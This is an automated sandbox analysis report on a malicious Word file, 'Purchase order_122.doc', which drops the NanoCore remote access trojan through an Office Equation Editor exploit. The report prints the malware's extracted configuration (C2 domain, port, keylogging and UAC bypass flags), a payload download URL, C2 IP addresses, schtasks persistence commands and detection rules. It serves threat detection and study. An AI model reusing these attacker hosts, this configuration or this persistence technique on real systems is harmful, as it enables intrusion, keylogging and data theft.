Loading ...

Play interactive tourEdit tour

Windows Analysis Report Purchase order_122.doc

Overview

General Information

Sample Name:Purchase order_122.doc
Analysis ID:509411
MD5:725c046a9a1bd2456115102985d98dd4
SHA1:dce11d03bb6838c7761865f5149251d01df65946
SHA256:9f33c3635ba0c704775ea7c0388955e5649ab913987d990e05f121b6c1681b7c
Tags:doc
Infos:

Most interesting Screenshot:

Detection

Nanocore
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Sigma detected: EQNEDT32.EXE connecting to internet
Malicious sample detected (through community Yara rule)
Sigma detected: NanoCore
Yara detected AntiVM3
Detected Nanocore Rat
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Yara detected Nanocore RAT
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Writes to foreign memory regions
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Allocates memory in foreign processes
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Office equation editor drops PE file
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses dynamic DNS services
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Installs a raw input device (often for capturing keystrokes)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Uses a known web browser user agent for HTTP communication
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Office Equation Editor has been started
Contains functionality to detect virtual machines (SLDT)
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 2660 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
  • EQNEDT32.EXE (PID: 2724 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • catzjt7863.exe (PID: 1848 cmdline: C:\Users\user\AppData\Roaming\catzjt7863.exe MD5: ACE96CF7EF24EEAC993B4DA172A5A8F0)
      • schtasks.exe (PID: 2024 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\eWoGxZG' /XML 'C:\Users\user\AppData\Local\Temp\tmp566B.tmp' MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
      • RegSvcs.exe (PID: 2936 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe MD5: 72A9F09010A89860456C6474E2E6D25C)
        • schtasks.exe (PID: 2524 cmdline: 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp249A.tmp' MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
        • schtasks.exe (PID: 1964 cmdline: 'schtasks.exe' /create /f /tn 'SMTP Service Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp1E64.tmp' MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
  • taskeng.exe (PID: 684 cmdline: taskeng.exe {AC07D2CB-425B-43FA-983F-3B14071F638D} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1] MD5: 65EA57712340C09B1B0C427B4848AE05)
    • RegSvcs.exe (PID: 1268 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe 0 MD5: 72A9F09010A89860456C6474E2E6D25C)
    • smtpsvc.exe (PID: 3048 cmdline: 'C:\Program Files (x86)\SMTP Service\smtpsvc.exe' 0 MD5: 72A9F09010A89860456C6474E2E6D25C)
  • smtpsvc.exe (PID: 1968 cmdline: 'C:\Program Files (x86)\SMTP Service\smtpsvc.exe' MD5: 72A9F09010A89860456C6474E2E6D25C)
  • cleanup

Malware Configuration

Threatname: NanoCore

{"Version": "1.2.2.0", "Mutex": "70bb352e-dceb-4105-9fdd-010e83e2", "Group": "NEW LIFE", "Domain1": "drrkingsleym001.ddns.net", "Domain2": "drrkingsleym001.ddns.net", "Port": 1665, "KeyboardLogging": "Enable", "RunOnStartup": "Enable", "RequestElevation": "Disable", "BypassUAC": "Enable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4", "BypassUserAccountControlData": "<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo />\r\n  <Triggers />\r\n  <Principals>\r\n    <Principal id=\"Author\">\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <IdleSettings>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <Priority>4</Priority>\r\n  </Settings>\r\n  <Actions Context=\"Author\">\r\n    <Exec>\r\n      <Command>\"#EXECUTABLEPATH\"</Command>\r\n      <Arguments>$(Arg0)</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000000.451843619.0000000000402000.00000040.00000001.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
  • 0xff8d:$x1: NanoCore.ClientPluginHost
  • 0xffca:$x2: IClientNetworkHost
  • 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000007.00000000.451843619.0000000000402000.00000040.00000001.sdmpJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
    00000007.00000000.451843619.0000000000402000.00000040.00000001.sdmpNanoCoreunknown Kevin Breen <kevin@techanarchy.net>
    • 0xfcf5:$a: NanoCore
    • 0xfd05:$a: NanoCore
    • 0xff39:$a: NanoCore
    • 0xff4d:$a: NanoCore
    • 0xff8d:$a: NanoCore
    • 0xfd54:$b: ClientPlugin
    • 0xff56:$b: ClientPlugin
    • 0xff96:$b: ClientPlugin
    • 0xfe7b:$c: ProjectData
    • 0x10882:$d: DESCrypto
    • 0x1824e:$e: KeepAlive
    • 0x1623c:$g: LogClientMessage
    • 0x12437:$i: get_Connected
    • 0x10bb8:$j: #=q
    • 0x10be8:$j: #=q
    • 0x10c04:$j: #=q
    • 0x10c34:$j: #=q
    • 0x10c50:$j: #=q
    • 0x10c6c:$j: #=q
    • 0x10c9c:$j: #=q
    • 0x10cb8:$j: #=q
    00000007.00000002.704763684.0000000000402000.00000040.00000001.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
    • 0xff8d:$x1: NanoCore.ClientPluginHost
    • 0xffca:$x2: IClientNetworkHost
    • 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
    00000007.00000002.704763684.0000000000402000.00000040.00000001.sdmpJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
      Click to see the 30 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      7.2.RegSvcs.exe.3678c96.6.raw.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
      • 0xe75:$x1: NanoCore.ClientPluginHost
      • 0x145e3:$x1: NanoCore.ClientPluginHost
      • 0x2d5df:$x1: NanoCore.ClientPluginHost
      • 0xe8f:$x2: IClientNetworkHost
      • 0x14610:$x2: IClientNetworkHost
      • 0x2d60c:$x2: IClientNetworkHost
      7.2.RegSvcs.exe.3678c96.6.raw.unpackNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
      • 0xe75:$x2: NanoCore.ClientPluginHost
      • 0x145e3:$x2: NanoCore.ClientPluginHost
      • 0x2d5df:$x2: NanoCore.ClientPluginHost
      • 0x1261:$s3: PipeExists
      • 0x1136:$s4: PipeCreated
      • 0x156be:$s4: PipeCreated
      • 0x2e6ba:$s4: PipeCreated
      • 0xeb0:$s5: IClientLoggingHost
      • 0x145fd:$s5: IClientLoggingHost
      • 0x2d5f9:$s5: IClientLoggingHost
      7.2.RegSvcs.exe.3678c96.6.raw.unpackJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
        7.2.RegSvcs.exe.3678c96.6.raw.unpackNanoCoreunknown Kevin Breen <kevin@techanarchy.net>
        • 0xddf:$a: NanoCore
        • 0xe38:$a: NanoCore
        • 0xe75:$a: NanoCore
        • 0xeee:$a: NanoCore
        • 0x14599:$a: NanoCore
        • 0x145ae:$a: NanoCore
        • 0x145e3:$a: NanoCore
        • 0x2d595:$a: NanoCore
        • 0x2d5aa:$a: NanoCore
        • 0x2d5df:$a: NanoCore
        • 0xe41:$b: ClientPlugin
        • 0xe7e:$b: ClientPlugin
        • 0x177c:$b: ClientPlugin
        • 0x1789:$b: ClientPlugin
        • 0x14355:$b: ClientPlugin
        • 0x14370:$b: ClientPlugin
        • 0x143a0:$b: ClientPlugin
        • 0x145b7:$b: ClientPlugin
        • 0x145ec:$b: ClientPlugin
        • 0x2d351:$b: ClientPlugin
        • 0x2d36c:$b: ClientPlugin
        7.2.RegSvcs.exe.560000.3.raw.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
        • 0xf7ad:$x1: NanoCore.ClientPluginHost
        • 0xf7da:$x2: IClientNetworkHost
        Click to see the 60 entries

        Sigma Overview

        AV Detection:

        barindex
        Sigma detected: NanoCoreShow sources
        Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe, ProcessId: 2936, TargetFilename: C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat

        Exploits:

        barindex
        Sigma detected: EQNEDT32.EXE connecting to internetShow sources
        Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 2.56.59.211, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2724, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
        Sigma detected: File Dropped By EQNEDT32EXEShow sources
        Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2724, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\catzx[1].exe

        E-Banking Fraud:

        barindex
        Sigma detected: NanoCoreShow sources
        Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe, ProcessId: 2936, TargetFilename: C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat

        System Summary:

        barindex
        Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
        Source: Process startedAuthor: Florian Roth: Data: Command: C:\Users\user\AppData\Roaming\catzjt7863.exe, CommandLine: C:\Users\user\AppData\Roaming\catzjt7863.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\catzjt7863.exe, NewProcessName: C:\Users\user\AppData\Roaming\catzjt7863.exe, OriginalFileName: C:\Users\user\AppData\Roaming\catzjt7863.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2724, ProcessCommandLine: C:\Users\user\AppData\Roaming\catzjt7863.exe, ProcessId: 1848
        Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper ArgumentsShow sources
        Source: Process startedAuthor: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth, Christian Burkard: Data: Command: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\catzjt7863.exe, ParentImage: C:\Users\user\AppData\Roaming\catzjt7863.exe, ParentProcessId: 1848, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe, ProcessId: 2936
        Sigma detected: Possible Applocker BypassShow sources
        Source: Process startedAuthor: juju4: Data: Command: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\catzjt7863.exe, ParentImage: C:\Users\user\AppData\Roaming\catzjt7863.exe, ParentProcessId: 1848, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe, ProcessId: 2936

        Stealing of Sensitive Information:

        barindex
        Sigma detected: NanoCoreShow sources
        Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe, ProcessId: 2936, TargetFilename: C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat

        Remote Access Functionality:

        barindex
        Sigma detected: NanoCoreShow sources
        Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe, ProcessId: 2936, TargetFilename: C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat

        Jbx Signature Overview

        Click to jump to signature section

        Show All Signature Results

        AV Detection:

        barindex
        Found malware configurationShow sources
        Source: 00000007.00000002.706102715.0000000003676000.00000004.00000001.sdmpMalware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "70bb352e-dceb-4105-9fdd-010e83e2", "Group": "NEW LIFE", "Domain1": "drrkingsleym001.ddns.net", "Domain2": "drrkingsleym001.ddns.net", "Port": 1665, "KeyboardLogging": "Enable", "RunOnStartup": "Enable", "RequestElevation": "Disable", "BypassUAC": "Enable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4", "BypassUserAccountControlData": "<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n <RegistrationInfo />\r\n <Triggers />\r\n <Principals>\r\n <Principal id=\"Author\">\r\n <LogonType>InteractiveToken</LogonType>\r\n <RunLevel>HighestAvailable</RunLevel>\r\n </Principal>\r\n </Principals>\r\n <Settings>\r\n <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n <AllowHardTerminate>true</AllowHardTerminate>\r\n <StartWhenAvailable>false</StartWhenAvailable>\r\n <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n <IdleSettings>\r\n <StopOnIdleEnd>false</StopOnIdleEnd>\r\n <RestartOnIdle>false</RestartOnIdle>\r\n </IdleSettings>\r\n <AllowStartOnDemand>true</AllowStartOnDemand>\r\n <Enabled>true</Enabled>\r\n <Hidden>false</Hidden>\r\n <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n <WakeToRun>false</WakeToRun>\r\n <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n <Priority>4</Priority>\r\n </Settings>\r\n <Actions Context=\"Author\">\r\n <Exec>\r\n <Command>\"#EXECUTABLEPATH\"</Command>\r\n <Arguments>$(Arg0)</Arguments>\r\n </Exec>\r\n </Actions>\r\n</Task"}
        Antivirus detection for URL or domainShow sources
        Source: http://binatonezx.tk/catzx.exeAvira URL Cloud: Label: malware
        Multi AV Scanner detection for domain / URLShow sources
        Source: binatonezx.tkVirustotal: Detection: 15%Perma Link
        Source: drrkingsleym001.ddns.netVirustotal: Detection: 7%Perma Link
        Source: drrkingsleym001.ddns.netVirustotal: Detection: 7%Perma Link
        Yara detected Nanocore RATShow sources
        Source: Yara matchFile source: 7.2.RegSvcs.exe.3678c96.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.RegSvcs.exe.560000.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.2.catzjt7863.exe.36dc7e0.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.RegSvcs.exe.564629.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.0.RegSvcs.exe.400000.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.2.catzjt7863.exe.36dc7e0.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.2.catzjt7863.exe.35f0330.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.RegSvcs.exe.36820f5.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.0.RegSvcs.exe.400000.2.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.0.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.RegSvcs.exe.367dacc.8.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.RegSvcs.exe.560000.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.RegSvcs.exe.367dacc.8.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.0.RegSvcs.exe.400000.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.2.catzjt7863.exe.359c310.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000007.00000000.451843619.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.704763684.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000000.453026505.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.455467498.00000000034FB000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.704932496.0000000000560000.00000004.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000000.452221812.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000000.452672182.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.455829246.000000000374F000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.706102715.0000000003676000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: catzjt7863.exe PID: 1848, type: MEMORYSTR
        Machine Learning detection for dropped fileShow sources
        Source: C:\Users\user\AppData\Roaming\catzjt7863.exeJoe Sandbox ML: detected
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\catzx[1].exeJoe Sandbox ML: detected
        Source: C:\Users\user\AppData\Roaming\eWoGxZG.exeJoe Sandbox ML: detected
        Source: 7.0.RegSvcs.exe.400000.3.unpackAvira: Label: TR/Dropper.MSIL.Gen7
        Source: 7.0.RegSvcs.exe.400000.2.unpackAvira: Label: TR/Dropper.MSIL.Gen7
        Source: 7.0.RegSvcs.exe.400000.1.unpackAvira: Label: TR/Dropper.MSIL.Gen7
        Source: 7.0.RegSvcs.exe.400000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen7
        Source: 7.2.RegSvcs.exe.400000.0.unpackAvira: Label: TR/Dropper.Gen
        Source: 7.0.RegSvcs.exe.400000.4.unpackAvira: Label: TR/Dropper.MSIL.Gen7
        Source: 7.2.RegSvcs.exe.560000.3.unpackAvira: Label: TR/NanoCore.fadte

        Exploits:

        barindex
        Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\catzjt7863.exe
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\catzjt7863.exe
        Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
        Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdblbu source: RegSvcs.exe, 00000007.00000002.704375005.00000000001E6000.00000004.00000040.sdmp
        Source: Binary string: C:\Windows\dll\System.pdbs.pdby source: RegSvcs.exe, 00000007.00000002.706338974.00000000047FD000.00000004.00000001.sdmp
        Source: Binary string: C:\Windows\symbols\dll\System.pdb\W source: RegSvcs.exe, 00000007.00000002.704375005.00000000001E6000.00000004.00000040.sdmp
        Source: Binary string: indows\System.pdbpdbtem.pdb0. source: RegSvcs.exe, 00000007.00000002.706338974.00000000047FD000.00000004.00000001.sdmp
        Source: Binary string: C:\Windows\System.pdbgs source: RegSvcs.exe, 00000007.00000002.704375005.00000000001E6000.00000004.00000040.sdmp
        Source: Binary string: RegSvcs.pdb source: smtpsvc.exe
        Source: Binary string: ystem.pdb(gR- source: RegSvcs.exe, 00000007.00000002.704389606.00000000001ED000.00000004.00000040.sdmp
        Source: Binary string: System.pdb source: RegSvcs.exe, 00000007.00000002.704389606.00000000001ED000.00000004.00000040.sdmp
        Source: Binary string: System.pdb8 source: RegSvcs.exe, 00000007.00000002.704389606.00000000001ED000.00000004.00000040.sdmp
        Source: Binary string: System.pdbX source: RegSvcs.exe, 00000007.00000002.706338974.00000000047FD000.00000004.00000001.sdmp
        Source: global trafficDNS query: name: binatonezx.tk
        Source: C:\Users\user\AppData\Roaming\catzjt7863.exeCode function: 4x nop then jmp 0034C0FAh
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 2.56.59.211:80
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 2.56.59.211:80
        Source: winword.exeMemory has grown: Private usage: 0MB later: 32MB

        Networking:

        barindex
        Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49166 -> 103.133.109.121:1665
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49167 -> 103.133.109.121:1665
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49168 -> 103.133.109.121:1665
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49169 -> 103.133.109.121:1665
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49170 -> 103.133.109.121:1665
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49171 -> 103.133.109.121:1665
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49173 -> 103.133.109.121:1665
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49174 -> 103.133.109.121:1665
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49175 -> 103.133.109.121:1665
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49176 -> 103.133.109.121:1665
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49177 -> 103.133.109.121:1665
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49178 -> 103.133.109.121:1665
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49179 -> 103.133.109.121:1665
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49180 -> 103.133.109.121:1665
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49181 -> 103.133.109.121:1665
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49182 -> 103.133.109.121:1665
        C2 URLs / IPs found in malware configurationShow sources
        Source: Malware configuration extractorURLs: drrkingsleym001.ddns.net
        Uses dynamic DNS servicesShow sources
        Source: unknownDNS query: name: drrkingsleym001.ddns.net
        Source: Joe Sandbox ViewASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN
        Source: Joe Sandbox ViewASN Name: GBTCLOUDUS GBTCLOUDUS
        Source: Joe Sandbox ViewIP Address: 2.56.59.211 2.56.59.211
        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 26 Oct 2021 12:32:28 GMTServer: Apache/2.4.48 (Unix) OpenSSL/1.0.2k-fipsLast-Modified: Tue, 26 Oct 2021 07:03:38 GMTETag: "59e00-5cf3c13a7ae42"Accept-Ranges: bytesContent-Length: 368128Vary: User-AgentKeep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 58 87 77 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 94 05 00 00 08 00 00 00 00 00 00 f6 b2 05 00 00 20 00 00 00 c0 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 06 00 00 02 00 00 00 00 